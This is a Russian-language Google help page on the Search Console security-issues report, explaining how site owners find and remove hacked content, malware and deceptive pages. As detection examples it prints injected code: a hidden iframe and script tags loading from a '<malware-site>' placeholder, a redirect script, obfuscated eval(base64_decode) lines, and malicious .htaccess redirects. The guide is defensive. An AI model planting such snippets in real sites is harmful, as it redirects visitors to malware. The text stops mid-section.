Отчет "Проблемы безопасности"

Если при проверке системы Google определят, что ваш сайт был взломан или представляет опасность для посетителей, например содержит вредоносное и нежелательное ПО или используется для фишинга, то информация об этом будет представлена в отчете "Проблемы безопасности".

Страницы или сайты, на которых обнаружены проблемы безопасности, в результатах поиска помечаются значком предупреждения, а при попытке перейти на подобные ресурсы открывается страница с предостережением.

Открыть отчет

 

Что такое проблемы безопасности?

Существуют следующие категории проблем безопасности:

  • Взломанный контент – любые материалы, которые без вашего согласия размещены на вашем сайте кем-то, кто использовал уязвимости в системе безопасности. Чтобы защитить посетителей, мы не показываем такой контент. Подробнее…
  • Вредоносное и нежелательное ПО – программное обеспечение, которое наносит ущерб пользователям и их устройствам, а также выполняет обманные или недопустимые действия. Подробнее…
  • Социальная инженерия – контент, который обманным путем убеждает пользователей выполнять опасные действия, например разглашать конфиденциальную информацию или скачивать программы. Подробнее…

Есть ли на моем сайте проблемы безопасности?

Если подобные проблемы имеются, их количество будет указано в верхней части отчета.

В противном случае на их месте будет сообщение с зеленой галочкой, говорящее об отсутствии проблем.

Сайт только что куплен!

Если нарушения на сайте существовали до смены владельца, устраните неполадки, перечисленные в отчете "Проблемы безопасности", после чего запросите повторную проверку. В запросе поясните, что вы недавно приобрели этот сайт и привели его в соответствие с Руководством Google для веб-мастеров.

На каких страницах есть проблемы?

Разверните описание проблемы, чтобы изучить список с примерами URL, на которых она встречается. Учтите, что в списке могут быть не все страницы с проблемой. Если список пуст, это значит, что нам по каким-то причинам не удалось подготовить примеры URL, а не то, что таких страниц нет.

В сведениях о проблеме указано, когда она была впервые обнаружена на вашем сайте, а также приведены краткое описание проблемы и ссылка на ресурс, где доступна дополнительная информация о ней.

Устранение проблемы

Чтобы устранить проблему безопасности на сайте, выполните следующие действия:

  1. Разверните описание проблемы в отчете "Проблемы безопасности".
  2. Прочитайте описание проблемы, после чего перейдите по ссылке "Подробнее…", чтобы узнать о деталях и о том, что делать дальше. Такие ссылки ведут на описания в нижней части страницы.
  3. Попробуйте найти и устранить проблемы на страницах, приведенных в качестве примера. В списке могут быть не все страницы вашего сайта, на которых обнаружены проблемы. Если список пуст, это значит, что нам по каким-то причинам не удалось подготовить примеры URL, а не то, что таких страниц нет.
  4. Устраните проблему на всех страницах сайта, где она присутствует. Ее решение только на некоторых страницах не приведет к возвращению части вашего сайта в результаты поиска.
  5. Устранить необходимо все проблемы на сайте, сколько бы их ни было.
  6. Убедитесь, что все проблемы решены.
  7. Устранив все перечисленные проблемы на всех страницах, нажмите Запросить проверку в отчете "Проблемы безопасности". В запросе поясните, что именно вы предприняли. Правильно составленный запрос содержит следующие сведения:
    • точное описание проблем, выявленных на вашем сайте;
    • описание мер, принятых вами для ее решения;
    • доказательство результативности ваших действий.
  8. Рассмотрение запроса на повторную проверку обычно занимает одну-две недели. Вы будете получать уведомления о ходе проверки по электронной почте. После отправки запроса вам придет сообщение с подтверждением того, что он принят. Не посылайте новый запрос, пока не поступит окончательное решение по текущему.

Сколько будет длиться проверка?

До двух недель. Мы отправим вам электронное письмо, подтверждающее получение вашего запроса. Также вы будете уведомлены по электронной почте об окончании проверки.

Не посылайте новый запрос, пока не поступит окончательное решение по текущему. Если отправить запрос на повторную проверку, не устранив проблему, для рассмотрения следующего запроса может потребоваться больше времени, а вам может быть присвоен статус Неоднократные нарушения.

Список проблем безопасности

Ниже перечислены возможные проблемы безопасности, а также приведены сведения о способах устранения каждой из них. Перечисленные ниже проблемы могут быть помечены как ошибки или предупреждения .

Обманные страницы

На сайте содержится контент, который обманным путем убеждает пользователей выполнять опасные действия, например разглашать конфиденциальную информацию или скачивать программы. Google Безопасный просмотр предупреждает пользователей о таком контенте.

Страницы считаются обманными, если они:

  • имитируют оформление или интерфейс авторитетного сайта, устройства пользователя или браузера;
  • обманным путем убеждают пользователя совершить действие, обычно выполняемое на сайте авторитетной организации, например ввести пароль или позвонить в службу поддержки.

Подобные обманные материалы относятся к социальной инженерии. Вы можете изучить дополнительные сведения о социальной инженерии и ознакомиться с примерами обманных страниц.

Устранение проблемы

1. Убедитесь в наличии проблемы

Найдите обманный контент на страницах, указанных в качестве примеров. Используйте инструмент проверки URL для сайтов и приложений.

2. Устраните проблему

Внесите необходимые изменения на страницы, на которых обнаружена социальная инженерия. Если вы считаете, что страница отнесена к небезопасным ошибочно, сообщите нам.

3. Запросите проверку

Убедившись, что все проблемы на сайте устранены, запросите проверку с помощью отчета "Проблемы безопасности". Проверка может занять как несколько дней, так и несколько недель.

Обманные встроенные ресурсы

На вашем сайте размещены опасные рекламные материалы или встроенные ресурсы, которые обманным путем убеждают пользователей выполнять опасные действия, например разглашать конфиденциальную информацию или скачивать программы. Обманный контент может находиться в сторонних элементах на вашей странице: изображениях, объявлениях и т. п. Google Безопасный просмотр предупреждает пользователей о таком контенте.

Иногда подобный контент сразу виден посетителям страницы. Бывает, что небезопасный контент содержится во всплывающих объявлениях или перенаправляет пользователей на опасные страницы. В любом случае страницы с такими встроенными материалами будут считаться нарушающими правила.

Подобные обманные материалы относятся к социальной инженерии. Вы можете изучить дополнительные сведения о социальной инженерии и ознакомиться с примерами обманных элементов.

Устранение проблемы

1. Убедитесь в наличии проблемы

Найдите обманный контент на страницах, указанных в качестве примеров. Убедитесь, что изображения, объявления и другие встроенные сторонние ресурсы на ваших страницах не являются обманным контентом Обратите внимание, что объявления в рекламном блоке могут чередоваться. Обновите страницу несколько раз, чтобы проверить все объявления. Некоторые объявления могут по-разному отображаться на компьютерах и мобильных устройствах. Используйте инструмент проверки URL для сайтов и приложений.

2. Удалите обманные объявления или ресурсы

Проверьте сторонние ресурсы: изображения, объявления и другие встроенные элементы. Внесите необходимые изменения на страницы, на которых обнаружена социальная инженерия.

3. Запросите проверку

Убедившись, что все проблемы на сайте устранены, запросите проверку с помощью отчета "Проблемы безопасности". Проверка может занять как несколько дней, так и несколько недель.

Вредоносное ПО
Сайт заражен или на нем содержится вредоносное ПО – различные программы и приложения для нанесения ущерба компьютерам, мобильным устройствам или их пользователям.

1. Выясните, можете ли вы решить проблему самостоятельно

Для устранения проблемы, связанной с вредоносным ПО, требуются навыки работы с кодом, а иногда и конфигурации веб-серверов для сайта. Если вы не располагаете всем необходимым, изучите сведения о том, как получить помощь.

2. Определите, с каким типом вредоносного ПО связана проблема, и устраните ее

Существует множество типов вредоносного ПО. Чтобы определить, с каким типом связана проблема, и решить ее, изучите материалы разделов, приведенных ниже. Учтите, что на вашем сайте может содержаться вредоносное ПО нескольких типов, поэтому выполнять диагностику и устранять проблемы следует очень тщательно.

Тип вредоносного ПО: конфигурация сервера

Описание

Злоумышленник взломал ваш сайт и переадресует посетителей на ресурсы с вредоносным ПО. Обычно для этого изменяют файлы конфигурации вашего сервера, с помощью которых администраторы настраивают переадресацию для отдельных страниц или каталогов на сайте. Например, на сервере Apache такие настройки хранятся в файлах HTACCESS и HTTPD.CONF.

Устранение проблемы

1. Убедитесь в наличии проблемы

Откройте некоторые из URL, перечисленных в отчете "Проблемы безопасности".

Не открывайте свои зараженные страницы в браузере.

Поступая так, вы подвергаете свой компьютер риску, поскольку вредоносное ПО зачастую использует именно уязвимости браузеров. Кроме того, хакеры иногда скрывают спам с помощью разных способов маскировки, чтобы владелец сайта его не обнаружил.

Мы предлагаем два способа для безопасного просмотра страниц:

  • Используйте Инструмент проверки URL, чтобы увидеть страницу так, как ее видит Google. Это поможет вам обнаружить проблему, поскольку хакеры способны вносить изменения, которые выявляются только системами Google. Например, злоумышленники могут поместить на вашем сайте ссылку на свой ресурс, которая будет не видна людям, но доступна роботам Google.
  • Используйте программу cURL или Wget для отправки HTTP-запросов (например, для загрузки страниц) из командной строки. Эти бесплатные инструменты помогают выявлять переадресацию и позволяют указывать любые URL перехода и параметры user-agent. Зачастую, чтобы остаться незамеченными и выбрать наиболее уязвимые цели, хакеры атакуют только определенные URL перехода и параметры user-agent. Использование названных инструментов позволит вам имитировать цель атаки. Если ваш запрос не выявил спам, попробуйте указывать разные URL перехода (например, ссылки на известные сайты и разные поисковые системы). Например, чтобы имитировать переход пользователя по ссылке из результатов Google Поиска на сайт www.example.com/page.html в операционной системе Windows, используйте cURL следующим образом:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Ответ от страницы, для которой изменена конфигурация сервера, может содержать следующие заголовки:

...
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. Удалите вредоносное ПО с сайта

Войдите на сервер, используя безопасную оболочку или терминальный доступ (сайт при этом может быть отключен), и проверьте файлы конфигурации сервера – повреждено может быть несколько из них. Выясните, нет ли в них подозрительных директив, таких как переадресация на неизвестные вредоносные сайты. Например, в файле .htaccess может содержаться следующая переадресация:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

Что ещё мы рекомендуем предпринять

  • Обязательно проверьте весь файл настроек сервера, поскольку злоумышленник мог добавить свой код в конце, чтобы снизить вероятность обнаружения.
  • Проверьте, не создал ли злоумышленник запланированные задачи cron, чтобы постоянно обновлять файл HTACCESS. Они могут храниться в нескольких местах, например различных папках /etc/cron* (в том числе /etc/crontab) и /var/spool/cron.
  • Вы можете изучить подробные сведения о том, как устранить проблемы на сайте, в частности как удалить нежелательное ПО и обезопаситься от злоумышленников в дальнейшем, в специальном руководстве.
Тип вредоносного ПО: внедрение кода SQL

Описание

Вероятно, злоумышленник взломал базу данных вашего сайта и автоматически добавил вредоносный код в каждую ее запись. Теперь этот код добавляется на каждую страницу с информацией, загружаемую сервером из базы данных, и может нанести вред компьютеру посетителя.

Устранение проблемы

1. Убедитесь в наличии проблемы

Выполните несколько запросов в командной строке на страницах, на которых обнаружены проблемы, и поищите в ответе слова, предполагающие взлом, например iframe или eval.

Не открывайте свои зараженные страницы в браузере.

Поступая так, вы подвергаете свой компьютер риску, поскольку вредоносное ПО зачастую использует именно уязвимости браузеров. Кроме того, хакеры иногда скрывают спам с помощью разных способов маскировки, чтобы владелец сайта его не обнаружил.

Мы предлагаем два способа для безопасного просмотра страниц:

  • Используйте Инструмент проверки URL, чтобы увидеть страницу так, как ее видит Google. Это поможет вам обнаружить проблему, поскольку хакеры способны вносить изменения, которые выявляются только системами Google. Например, злоумышленники могут поместить на вашем сайте ссылку на свой ресурс, которая будет не видна людям, но доступна роботам Google.
  • Используйте программу cURL или Wget для отправки HTTP-запросов (например, для загрузки страниц) из командной строки. Эти бесплатные инструменты помогают выявлять переадресацию и позволяют указывать любые URL перехода и параметры user-agent. Зачастую, чтобы остаться незамеченными и выбрать наиболее уязвимые цели, хакеры атакуют только определенные URL перехода и параметры user-agent. Использование названных инструментов позволит вам имитировать цель атаки. Если ваш запрос не выявил спам, попробуйте указывать разные URL перехода (например, ссылки на известные сайты и разные поисковые системы). Например, чтобы имитировать переход пользователя по ссылке из результатов Google Поиска на сайт www.example.com/page.html в операционной системе Windows, используйте cURL следующим образом:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Затем войдите на сервер базы данных или откройте ее с помощью специального инструмента, например phpMyAdmin. Если вы использовали Wget или cURL, попробуйте соотнести выявленные этими программами повреждения исходного кода страницы с информацией в базе данных. Например, если вы заметили, что на вашу страницу добавлено подозрительное окно iframe, выполните поиск его кода с помощью SQL-запроса. Пример запроса:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

Проверьте журнал базы данных и файлы с ошибками на предмет подозрительных действий, например команд SQL, которые не связаны с обычными действиями пользователя или ошибками.

2. Очистите сайт

Завершив подготовку к очистке сайта, вы можете исправить каждую поврежденную запись базы данных или восстановить базу из последней надежной резервной копии.

Что ещё мы рекомендуем предпринять

  • Вы можете изучить подробные сведения о том, как устранить проблемы на сайте, в частности как удалить нежелательное ПО и обезопаситься от злоумышленников в дальнейшем, в специальном руководстве.
Тип вредоносного ПО: внедрение кода

Описание

Злоумышленники добавили на страницы вашего сайта вредоносный код, например для отображения окон iframe с переадресацией на опасные ресурсы.

Устранение проблемы

1. Убедитесь в наличии проблемы

Откройте URL, перечисленные в отчете "Проблемы безопасности" как зараженные. Изучите HTML-код ответов на предмет наличия вредоносного кода.

Не открывайте свои зараженные страницы в браузере.

Поступая так, вы подвергаете свой компьютер риску, поскольку вредоносное ПО зачастую использует именно уязвимости браузеров. Кроме того, хакеры иногда скрывают спам с помощью разных способов маскировки, чтобы владелец сайта его не обнаружил.

Мы предлагаем два способа для безопасного просмотра страниц:

  • Используйте Инструмент проверки URL, чтобы увидеть страницу так, как ее видит Google. Это поможет вам обнаружить проблему, поскольку хакеры способны вносить изменения, которые выявляются только системами Google. Например, злоумышленники могут поместить на вашем сайте ссылку на свой ресурс, которая будет не видна людям, но доступна роботам Google.
  • Используйте программу cURL или Wget для отправки HTTP-запросов (например, для загрузки страниц) из командной строки. Эти бесплатные инструменты помогают выявлять переадресацию и позволяют указывать любые URL перехода и параметры user-agent. Зачастую, чтобы остаться незамеченными и выбрать наиболее уязвимые цели, хакеры атакуют только определенные URL перехода и параметры user-agent. Использование названных инструментов позволит вам имитировать цель атаки. Если ваш запрос не выявил спам, попробуйте указывать разные URL перехода (например, ссылки на известные сайты и разные поисковые системы). Например, чтобы имитировать переход пользователя по ссылке из результатов Google Поиска на сайт www.example.com/page.html в операционной системе Windows, используйте cURL следующим образом:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Примеры вредоносного кода приведены ниже:

  • окно iframe, обеспечивающее загрузку вредоносного сайта:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • код на JavaScript или другом скриптовом языке, который вызывает и запускает скрипты с сайта злоумышленника:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • скрипт, который переадресует браузер на сайт злоумышленника:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • замаскированный вредоносный код:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • общие объекты, предназначенные для произвольного добавления вредоносного кода в безвредные скрипты:
    #Файл httpd.conf, измененный хакером
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Проверьте все подозрительные фрагменты кода на сайте. Чтобы найти код окон iframe, можно выполнить поиск по запросу iframe. Другие полезные ключевые слова: script, eval и unescape. Например, чтобы найти все файлы для варианта iframe в Unix-подобных системах, используйте следующую команду:

$grep -irn "iframe" ./ | less

2. Очистите сайт

Завершив подготовку к очистке сайта, вы можете заменить зараженные файлы надежными резервными или удалить с каждой страницы вредоносный код, а также все связанные с ним скрипты и файлы. Если вы при этом будете редактировать файлы конфигурации сервера, перезагрузите его, чтобы применить изменения.

Что ещё мы рекомендуем предпринять

  • Вы можете изучить подробные сведения о том, как устранить проблемы на сайте, в частности как удалить нежелательное ПО и обезопаситься от злоумышленников в дальнейшем, в специальном руководстве.
Тип вредоносного ПО: шаблон ошибки

Описание

Для распространения вредоносного ПО злоумышленники используют шаблон сообщения об ошибке, например "404 – файл не найден". Таким образом злоумышленники могут атаковать даже страницы, которых нет на вашем сайте.

Устранение проблемы

1. Убедитесь в наличии проблемы

Запросите на своем сайте страницу, которая не существует или связана с ошибкой иного типа, и определите, поступил ли ответ с другого сайта или содержит ли он вредоносное ПО.

Не открывайте свои зараженные страницы в браузере.

Поступая так, вы подвергаете свой компьютер риску, поскольку вредоносное ПО зачастую использует именно уязвимости браузеров. Кроме того, хакеры иногда скрывают спам с помощью разных способов маскировки, чтобы владелец сайта его не обнаружил.

Мы предлагаем два способа для безопасного просмотра страниц:

  • Используйте Инструмент проверки URL, чтобы увидеть страницу так, как ее видит Google. Это поможет вам обнаружить проблему, поскольку хакеры способны вносить изменения, которые выявляются только системами Google. Например, злоумышленники могут поместить на вашем сайте ссылку на свой ресурс, которая будет не видна людям, но доступна роботам Google.
  • Используйте программу cURL или Wget для отправки HTTP-запросов (например, для загрузки страниц) из командной строки. Эти бесплатные инструменты помогают выявлять переадресацию и позволяют указывать любые URL перехода и параметры user-agent. Зачастую, чтобы остаться незамеченными и выбрать наиболее уязвимые цели, хакеры атакуют только определенные URL перехода и параметры user-agent. Использование названных инструментов позволит вам имитировать цель атаки. Если ваш запрос не выявил спам, попробуйте указывать разные URL перехода (например, ссылки на известные сайты и разные поисковые системы). Например, чтобы имитировать переход пользователя по ссылке из результатов Google Поиска на сайт www.example.com/page.html в операционной системе Windows, используйте cURL следующим образом:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. Очистите сайт

Подключитесь к веб-серверу и проверьте файлы конфигурации сервера на наличие директив страниц ошибок. Например, шаблон ошибки для серверов Apache может быть объявлен в файле HTACCESS. Пример файла HTACCESS, возвращающего страницы ошибки 404 с вредоносного сайта, приведен ниже:

ErrorDocument 404 http://<malware-site>/index.html 

Завершив подготовку к очистке сайта, вы можете заменить файлы HTACCESS надежными резервными или удалить в существующих ненужные директивы ErrorDocument. Не забудьте также очистить файлы ошибок, если они есть на сайте. Наконец, перезапустите веб-сервер, чтобы все изменения вступили в силу.

Что ещё мы рекомендуем предпринять

  • Вы можете изучить подробные сведения о том, как устранить проблемы на сайте, в частности как удалить нежелательное ПО и обезопаситься от злоумышленников в дальнейшем, в специальном руководстве.
Тип вредоносного ПО: межсайтовое вредоносное ПО

Описание

На сайте загружается контент с зараженного ресурса. В таком случае в браузере Chrome появляется особый значок:

cross-site malware warning

Как устранить проблему​

  1. Убедитесь в наличии проблемы, открыв некоторые из примеров URL, представленных в отчете "Проблемы безопасности". Если сайт содержит проблему, появится указанный выше значок.
  2. В предупреждении из браузера будет указан домен, на котором содержится спорный контент. Вам необходимо удалить все ссылки на небезопасный ресурс, приведенные в предупреждении.
  3. Если вы обнаружили, что на одной из страниц вашего сайта без вашего ведома появился контент с вредоносного сайта, вероятно, ваш ресурс был взломан. Поэтому независимо от того, знали вы о размещении контента или нет, мы рекомендуем выполнить процедуру по восстановлению взломанных сайтов: закрыть свой ресурс на карантин, оценить ущерб, а затем очистить сайт.
  4. После удаления обманного контента запросите проверку на наличие вредоносного или нежелательного ПО. Проверка может занять как несколько дней, так и несколько недель.
  5. Если вы изначально добавляли на свой ресурс контент с надежного сайта, который был взломан, но затем успешно восстановлен, проверьте статус такого сайта на странице Google Безопасного просмотра, например с помощью запроса http://www.google.com/safebrowsing/diagnostic?site=www.example.com. Владельцы подобных сайтов быстро устраняют последствия взлома.
Остальные типы вредоносного ПО

Существует масса других типов вредоносного ПО. Советы по тому, как выявлять и устранять связанные с ними проблемы, представлены на сайте Web Fundamentals. Устранив все неполадки на своем сайте, запросите его проверку.

3. Запросите проверку

Убедившись, что все проблемы на сайте устранены, запросите проверку с помощью отчета "Проблемы безопасности". Проверка может занять как несколько дней, так и несколько недель.

Тип взлома: внедрение кода

Злоумышленник взломал ваш сайт и разместил на его страницах вредоносный код, предназначенный, например, для переадресации на зараженный ресурс или использования ПО для майнинга криптовалюты в браузере посетителя, просматривающего страницу сайта.

1. Выясните, можете ли вы решить проблему самостоятельно

Изучите специальные материалы, которые помогут определить, под силу ли вам справиться с проблемой самостоятельно, а если нет, то как привлечь необходимых специалистов.

2. Убедитесь в наличии проблемы

Не открывайте свои зараженные страницы в браузере.

Поступая так, вы подвергаете свой компьютер риску, поскольку вредоносное ПО зачастую использует именно уязвимости браузеров. Кроме того, хакеры иногда скрывают спам с помощью разных способов маскировки, чтобы владелец сайта его не обнаружил.

Мы предлагаем два способа для безопасного просмотра страниц:

  • Используйте Инструмент проверки URL, чтобы увидеть страницу так, как ее видит Google. Это поможет вам обнаружить проблему, поскольку хакеры способны вносить изменения, которые выявляются только системами Google. Например, злоумышленники могут поместить на вашем сайте ссылку на свой ресурс, которая будет не видна людям, но доступна роботам Google.
  • Используйте программу cURL или Wget для отправки HTTP-запросов (например, для загрузки страниц) из командной строки. Эти бесплатные инструменты помогают выявлять переадресацию и позволяют указывать любые URL перехода и параметры user-agent. Зачастую, чтобы остаться незамеченными и выбрать наиболее уязвимые цели, хакеры атакуют только определенные URL перехода и параметры user-agent. Использование названных инструментов позволит вам имитировать цель атаки. Если ваш запрос не выявил спам, попробуйте указывать разные URL перехода (например, ссылки на известные сайты и разные поисковые системы). Например, чтобы имитировать переход пользователя по ссылке из результатов Google Поиска на сайт www.example.com/page.html в операционной системе Windows, используйте cURL следующим образом:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Злоумышленник мог внедрить вредоносный код на вашем сайте непосредственно в HTML-файлы (например, реализовав переадресацию с помощью JavaScript) или в файлы, генерирующие страницы сайта (например, в PHP-файлы).

Загрузите одну из приведенных в отчете страниц и изучите ответ. Чтобы переадресовать пользователей с вашего сайта на свой, злоумышленники могут применять различные способы, в частности следующие:

  • Переадресация
    • Переадресация с помощью заголовков, когда злоумышленники изменяют файлы конфигурации сервера, с помощью которых администраторы настраивают переадресацию для отдельных страниц или каталогов на сайте. Например, на сервере Apache такие настройки хранятся в файлах HTACCESS и HTTPD.CONF.
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • Переадресация с помощью JavaScript
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • вредоносный код JavaScript, загруженный с другого сайта:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • замаскированный вредоносный код:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Попробуйте найти подозрительный код в ответах и на своем сайте. Могут пригодиться следующие ключевые слова: search, eval, base64_decode и unescape.

3. Очистите сайт

Завершив подготовку к очистке сайта, вы можете заменить зараженные файлы надежными резервными или удалить спам самостоятельно.

Что ещё мы рекомендуем предпринять

  • Вы можете изучить подробные сведения о том, как устранить проблемы на сайте, в частности как удалить нежелательное ПО и обезопаситься от злоумышленников в дальнейшем, в специальном руководстве.

4. Запросите проверку

Убедившись, что все проблемы на сайте устранены, запросите проверку с помощью отчета "Проблемы безопасности". Проверка может занять как несколько дней, так и несколько недель.

Тип взлома: внедрение контента

Злоумышленник добавил на страницы сайта спам в виде текста или ссылок. Внедренный контент может содержать названия популярных фармацевтических препаратов и другой спам, не связанный с тематикой вашего ресурса.

Как правило, хакеры взламывают сайт, воспользовавшись одной из перечисленных ниже трех лазеек.

  • Получают доступ к незащищенному каталогу на сервере. Например, если вы случайно настроили для какого-либо каталога слишком высокий уровень разрешений.
  • Используют уязвимость в программном обеспечении, которое используется на сайте, скажем, в системе управления контентом. Например, если вы используете устаревшую и небезопасную версию Drupal, Joomla! или WordPress.
  • Взламывают сторонние плагины на сайте, например счетчики посетителей.

1. Выясните, можете ли вы решить проблему самостоятельно

Изучите специальные материалы, которые помогут определить, под силу ли вам справиться с проблемой самостоятельно, а если нет, то как привлечь необходимых специалистов.

2. Убедитесь в наличии проблемы

Не открывайте свои зараженные страницы в браузере.

Поступая так, вы подвергаете свой компьютер риску, поскольку вредоносное ПО зачастую использует именно уязвимости браузеров. Кроме того, хакеры иногда скрывают спам с помощью разных способов маскировки, чтобы владелец сайта его не обнаружил.

Мы предлагаем два способа для безопасного просмотра страниц:

  • Используйте Инструмент проверки URL, чтобы увидеть страницу так, как ее видит Google. Это поможет вам обнаружить проблему, поскольку хакеры способны вносить изменения, которые выявляются только системами Google. Например, злоумышленники могут поместить на вашем сайте ссылку на свой ресурс, которая будет не видна людям, но доступна роботам Google.
  • Используйте программу cURL или Wget для отправки HTTP-запросов (например, для загрузки страниц) из командной строки. Эти бесплатные инструменты помогают выявлять переадресацию и позволяют указывать любые URL перехода и параметры user-agent. Зачастую, чтобы остаться незамеченными и выбрать наиболее уязвимые цели, хакеры атакуют только определенные URL перехода и параметры user-agent. Использование названных инструментов позволит вам имитировать цель атаки. Если ваш запрос не выявил спам, попробуйте указывать разные URL перехода (например, ссылки на известные сайты и разные поисковые системы). Например, чтобы имитировать переход пользователя по ссылке из результатов Google Поиска на сайт www.example.com/page.html в операционной системе Windows, используйте cURL следующим образом:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Откройте несколько страниц своего сайта и попробуйте найти ответы, связанные с подозрительным контентом или ссылками, которые вы не добавляли. Например, можно использовать термины, связанные с лекарствами или спамом, такие как "виагра" или "заработать деньги".

3. Очистите сайт

Завершив подготовку к очистке сайта, вы можете заменить зараженные файлы надежными резервными или удалить спам и ненужные ссылки. Сделайте это на всех страницах, перечисленных в отчете "Проблемы безопасности". Также поищите другие страницы сайта, которые могли быть взломаны. Для этого добавьте ключевое слово "site:" в поиске Google и попробуйте найти исходные файлы на своем сайте.

Что ещё мы рекомендуем предпринять

  • Вы можете изучить подробные сведения о том, как устранить проблемы на сайте, в частности как удалить нежелательное ПО и обезопаситься от злоумышленников в дальнейшем, в специальном руководстве.

4. Запросите проверку

Убедившись, что все проблемы на сайте устранены, запросите проверку с помощью отчета "Проблемы безопасности". Проверка может занять как несколько дней, так и несколько недель.

Тип взлома: внедрение URL

Злоумышленник создал на вашем сайте новые страницы. Скорее всего, на них есть спам в виде текста или ссылок. Иногда новые страницы содержат код, который выполняет нежелательные действия, например перенаправляет ваших посетителей на другие сайты или делает их участниками DDOS-атаки.

1. Выясните, можете ли вы решить проблему самостоятельно

Изучите специальные материалы, которые помогут определить, под силу ли вам справиться с проблемой самостоятельно, а если нет, то как привлечь необходимых специалистов.

2. Убедитесь в наличии проблемы

Не открывайте свои зараженные страницы в браузере.

Поступая так, вы подвергаете свой компьютер риску, поскольку вредоносное ПО зачастую использует именно уязвимости браузеров. Кроме того, хакеры иногда скрывают спам с помощью разных способов маскировки, чтобы владелец сайта его не обнаружил.

Мы предлагаем два способа для безопасного просмотра страниц:

  • Используйте Инструмент проверки URL, чтобы увидеть страницу так, как ее видит Google. Это поможет вам обнаружить проблему, поскольку хакеры способны вносить изменения, которые выявляются только системами Google. Например, злоумышленники могут поместить на вашем сайте ссылку на свой ресурс, которая будет не видна людям, но доступна роботам Google.
  • Используйте программу cURL или Wget для отправки HTTP-запросов (например, для загрузки страниц) из командной строки. Эти бесплатные инструменты помогают выявлять переадресацию и позволяют указывать любые URL перехода и параметры user-agent. Зачастую, чтобы остаться незамеченными и выбрать наиболее уязвимые цели, хакеры атакуют только определенные URL перехода и параметры user-agent. Использование названных инструментов позволит вам имитировать цель атаки. Если ваш запрос не выявил спам, попробуйте указывать разные URL перехода (например, ссылки на известные сайты и разные поисковые системы). Например, чтобы имитировать переход пользователя по ссылке из результатов Google Поиска на сайт www.example.com/page.html в операционной системе Windows, используйте cURL следующим образом:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Попробуйте запросить приведенные в отчете примеры URL, чтобы выяснить, активны ли они. Вряд ли эти страницы создали вы, поэтому вам необходимо удалить их или код, с помощью которого они создаются. Подробнее…

Найти страницы, которые вы не создавали, также можно с помощью ключевого слова "site:".

  • Если сайт небольшой, то в поиске Google можно использовать запрос [site:example.com]. Вы сможете ознакомиться со списком проиндексированных страниц и выяснить, все ли из них созданы вами.
  • Если сайт крупный, введите более точный запрос, например:
    • [site:example.com pharmacy] (список страниц, содержащих слово pharmacy (аптека), на сайте example.com);
    • [site:example.com/wp-admin/] (список страниц в разделе администратора вашего сайта WordPress).

3. Очистите сайт

Завершив подготовку к очистке сайта, вы можете восстановить сайт из последней надежной резервной копии или вручную удалить нежелательные страницы, файлы и код, который хакер использовал для их создания.

Что ещё мы рекомендуем предпринять

  • Вы можете изучить подробные сведения о том, как устранить проблемы на сайте, в частности как удалить нежелательное ПО и обезопаситься от злоумышленников в дальнейшем, в специальном руководстве.

4. Запросите проверку

Убедившись, что все проблемы на сайте устранены, запросите проверку с помощью отчета "Проблемы безопасности". Проверка может занять как несколько дней, так и несколько недель.

Загрузки вредоносного ПО

Посетителям вашего сайта предлагается скачать программы, которые, по данным Google Безопасного просмотра, являются вредоносными или нежелательными. В этом случае посетителям сайта в браузере Chrome может показываться предупреждение. Чтобы оно не появлялось, вам необходимо удалить спорные материалы.

1. Изучите проблему

Если материалы размещены намеренно, удалите их с сайта и перейдите к разделу Запросите проверку.

Если материалы, которые предлагаются посетителям, вам незнакомы, вероятно, ваш сайт был взломан. Устраните проблемы на сайте, а затем найдите и удалите спорные материалы, которые предлагается скачать посетителям.

2. Выясните, можете ли вы решить проблему самостоятельно

Изучите специальные материалы, которые помогут определить, под силу ли вам справиться с проблемой самостоятельно, а если нет, то как привлечь необходимых специалистов.

3. Убедитесь в наличии проблемы

Чтобы убедиться, что на сайте действительно есть ссылки на небезопасные ресурсы, изучите несколько примеров страниц.

4. Очистите сайт

